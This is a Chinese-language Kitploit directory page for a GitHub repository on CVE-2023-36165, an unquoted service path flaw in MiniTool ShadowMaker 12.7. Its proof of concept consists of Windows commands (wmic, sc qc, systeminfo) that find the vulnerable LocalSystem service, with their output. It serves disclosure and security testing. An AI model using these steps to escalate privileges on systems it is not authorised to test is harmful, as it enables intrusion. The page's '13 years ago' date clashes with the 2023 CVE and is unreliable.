Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-36165 — An issue in MiniTool Partition Wizard ShadowMaker v.12.7 allows an attacker to execute arbitrary code and gain privileges via the SchedulerService.exe component. | Kitploit
工具/GitHubGitHub/trailer2/cve-2023-36165
权限提升漏洞分析漏洞利用错误配置
GitHubtrailer2/cve-2023-36165

CVE-2023-36165

An issue in MiniTool Partition Wizard ShadowMaker v.12.7 allows an attacker to execute arbitrary code and gain privileges via the SchedulerService.exe component.

查看仓库
13年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-36165

MiniTool Partition Wizard ShadowMaker v.12.7 中存在一个问题,允许攻击者通过 SchedulerService.exe 组件执行任意代码并提升权限。

漏洞利用标题:MiniTool Partition Wizard ShadowMaker v.12.7 - 未引用的服务路径

日期:2023年8月5日

漏洞利用作者:Idan Malihi

厂商主页:https://www.minitool.com/

软件链接:https://www.minitool.com/download-center/

版本:12.7

测试平台:Microsoft Windows 10 Pro

CVE:CVE-2023-36165

#PoC

C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\" | findstr /i /v """ MTSchedulerService MTSchedulerService C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe Auto

C:\Users>sc qc MTSchedulerService [SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MTSchedulerService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : MTSchedulerService DEPENDENCIES : SERVICE_START_NAME : LocalSystem

C:\Users>systeminfo

主机名: DESKTOP-LA7J17P 操作系统名称: Microsoft Windows 10 Pro 操作系统版本: 10.0.19042 N/A Build 19042 操作系统制造商: Microsoft Corporation

下载工具